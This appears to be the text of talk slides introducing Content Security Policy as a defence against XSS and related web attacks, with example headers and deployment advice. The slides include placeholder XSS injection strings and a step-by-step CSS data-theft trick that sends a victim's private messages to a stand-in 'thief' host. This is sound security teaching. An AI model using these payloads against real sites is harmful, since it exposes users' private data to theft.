Hackers!

how to keep them at bay

Introduction to Content Security Policy

Who's that guy?

Zbyszek Tenerowicz

@naugtur
http://naugtur.pl

R&D at

Regular speaker at

Dangers

Clickjacking

Data theft

CSRF

XSS

Session hijack

Popular security

Not in the scope for today

✔ Session cookies:

 domain, secure, httponly

X-Iframe-Options header

✔ Iframe sandboxing

✔ CSRF tokens

Dangers left

Persistent XSS

Reflected XSS

Data theft

Where do threats come from?

The good

Bugs in application

✔ they can be fixed

The bad

Extensions, 3rd parties and user scripts

✘ at least they're not common...

The ugly

Vulnerable as specified

☢ iframes, clickjacking, stealing data with CSS

Persistent XSS

Input is saved and application serves it to victims


    
                        

    foo" onmouseover="CODE"
                        

or


    {{ username }}
                        

    <script>CODE</script>
                        

Reflected XSS

Input is not stored by the application


    404 not found: {{ URL }}
                        

    http://mydomain.com/<script>CODE</script>
                        

XSS can be used to

Perform actions as currently logged-in user

Steal data available to logged-in user

Infect user with malware

Wanna be a hacker? Start here: https://github.com/cure53/H5SC

CSS data theft

  1. Send a message:
    
      ');}
                            
  2. Wait for messages to steal
  3. Send a message:
    
      {}body{background-image:url('http://thief/
                            
  4. Make the user open a site where his inbox is loaded as CSS
    
      <p>{}body{background-image:url('http://thief/
      </p><p>private message</p><p>');}</p>
                                

Works with JavaScript disabled

Content Security Policy

Just add headers



    Content-Security-Policy: 
        script-src 'self' https://apis.google.com
                        
Tutorial on html5rocks.com

Capabilities

  • Source whitelists for all resources
  • Block eval
  • Block inline scripts
  • Block event attributes

✔ Any XSS bug in the app is now useless

✔ Extensions can't add code to your app

✔ Cross-domain requests to domains you approve

✘ Protects only HTML documents

Browser support

Guess which directive is supported in IE

Details: caniuse.com

Example from github


    Content-Security-Policy:                    
        default-src *; 
        script-src 
            https://github.global.ssl.fastly.net 
            https://ssl.google-analytics.com 
            https://collector-cdn.github.com; 
        style-src 'self' 'unsafe-inline' 'unsafe-eval' 
            https://github.global.ssl.fastly.net; 
        object-src https://github.global.ssl.fastly.net
                    

Deployment

Check if your app breaks the policy without blocking it


    Content-Security-Policy-Report-Only:
        default-src "self"; report-uri /csp;
                      

What do I do with a report?

It's a work in progress, but I'm on it

Play safe!

@naugtur
http://naugtur.pl